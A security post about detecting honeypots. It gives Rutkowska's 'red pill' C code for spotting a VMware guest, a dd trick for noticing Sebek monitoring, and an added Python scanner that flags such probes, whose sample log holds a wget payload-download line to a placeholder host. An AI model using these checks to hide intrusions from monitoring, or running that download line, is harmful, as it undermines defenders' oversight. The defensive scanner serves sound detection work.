When working on honeypots, don't expect to uncover anything that is actually very secret, and don't expect to find a 0day. The Honeynet Project wasn't even capable of getting a few OK results after so many years.
The reason: people are not stupid. If you catch someone in VMware or VirtualPC etc., and he is stupid enough not to understand that he is inside the matrix, then the value of the information you get from him will be just as worthless. So instead of satisfying yourself with the "hey, look at the kiddie, he thinks he is hacking, but I am smarter" approach, you can decide to do something more useful. As mentioned before, you will only be able to catch some neighbour kids.
It is very simple to determine that the host is actually a virtual PC. You can look at the descriptions of the devices. If you see e.g. VMware devices, that means you are in.
Or you can run Joanna's red pill:
#include <stdio.h>

/* Joanna Rutkowska's "red pill": SIDT stores the IDT base without needing
   ring 0, and on a VMware/VirtualPC guest the relocated IDT base sits high
   enough that its top byte exceeds 0xd0. Assumes 32-bit x86: the address of
   m is patched into the 4-byte displacement of the SIDT instruction, so this
   will not work when compiled for x86-64, and the stack must be executable. */
int main () {
    unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3"; /* sidt [disp32]; ret */
    *((unsigned*)&rpill[3]) = (unsigned)m;   /* patch in the address of m */
    ((void(*)())&rpill)();                   /* run the two instructions */
    printf ("idt base: %#x\n", *((unsigned*)&m[2]));
    if (m[5]>0xd0) printf ("Inside Matrix!\n");
    else printf ("Not in Matrix.\n");
    return 0;
}
Note that this can give false positives on kernels newer than 2.4.18.
The problem lies in how you will sniff him. Will he be stupid enough to use nc after he gets inside the box, so that you can easily sniff? How about the SSH connection?
Let's say you put in a keylogger for system calls, so you get SSH keylogs. Probably you'll be using Sebek.
Just by doing a dd if=/dev/zero of=/dev/null, which normally doesn't do anything, you'll notice that the CPU goes to around 100% and network traffic increases like hell. That means you are being monitored. There are a lot of easier ways to detect it, so if one becomes obsolete, you try the other one.
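The honeypot operator can turn both checks above (reading device descriptions, and the dd loop that makes Sebek light up) around: the following added example, which is not from the original post, scans captured shell commands for those probes and marks the point after which a session's data is suspect. The log format and the list of device-enumeration command names are my assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of captured shell commands, one "<epoch> <pid> <command>"
# per line, the kind of record a Sebek keystroke log yields once reassembled.
SAMPLE_LOG = """\
1101000001 2311 uname -a
1101000005 2311 cat /proc/cpuinfo
1101000009 2311 lspci
1101000012 2311 dd if=/dev/zero of=/dev/null
1101000020 2311 wget http://example.invalid/x.tgz
1101000030 2400 dd if=/dev/sda of=/dev/null bs=1M count=10
"""

# Commands used to read device descriptions (looking for VMware/VirtualPC
# device names). Assumed list; the post only says "look at the devices".
DEVICE_PROBE = re.compile(r"^(?:lspci|lsusb|dmesg|dmidecode)\b|^cat\s+/proc/(?:scsi|ide|bus)/")

def is_sebek_probe(cmd: str) -> bool:
    """The dd trick from the post: an unbounded /dev/zero -> /dev/null read loop,
    useless as work but one Sebek record per read() call, hence CPU and traffic."""
    toks = cmd.split()
    if not toks or toks[0] != "dd":
        return False
    opts = dict(t.split("=", 1) for t in toks[1:] if "=" in t)
    return opts.get("if") == "/dev/zero" and opts.get("of") == "/dev/null" and "count" not in opts

def scan(log: str) -> List[Tuple[int, int, str]]:
    """Return (epoch, pid, kind) for every captured command that looks like a probe."""
    findings = []
    for line in log.splitlines():
        ts, pid, cmd = line.split(" ", 2)
        if is_sebek_probe(cmd):
            findings.append((int(ts), int(pid), "sebek-probe"))
        elif DEVICE_PROBE.match(cmd):
            findings.append((int(ts), int(pid), "device-probe"))
    return findings

def tainted_after(log: str) -> Dict[int, int]:
    """Per pid, the earliest time the intruder may have realised he is watched;
    what that session does after this point is of doubtful value."""
    first: Dict[int, int] = {}
    for ts, pid, _ in scan(log):
        first[pid] = min(ts, first.get(pid, ts))
    return first

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(tainted_after(SAMPLE_LOG))
```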
Just keep in mind...